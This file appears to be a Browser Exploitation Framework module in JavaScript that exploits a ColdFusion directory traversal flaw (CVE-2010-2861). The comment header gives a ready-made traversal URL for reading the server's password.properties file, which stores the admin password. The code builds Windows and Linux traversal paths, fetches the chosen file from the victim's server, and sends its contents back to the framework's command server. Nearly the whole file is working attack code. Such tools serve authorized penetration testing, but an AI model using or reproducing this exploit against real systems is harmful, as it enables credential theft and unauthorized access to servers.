// // Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // /** * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor . * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal. * By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored: * the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows) * * On a default win installation, the following vector works great: * http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en * demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/ */ beef.execute(function() { fileToRetrieve = "<%= @fileToRetrieve %>"; targetOS = "<%= @os_combobox %>"; cf_version = "<%= @cf_version %>"; var uri = null; if(targetOS == "Windows"){ uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en'; }else{ uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en'; } beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){ if(response.status_code == "success"){ titleStart = response.response_body.indexOf(""); titleEnd = response.response_body.indexOf(""); exploitResults = response.response_body.substring(titleStart + 7,titleEnd); beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults); }else{ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed."); } }); });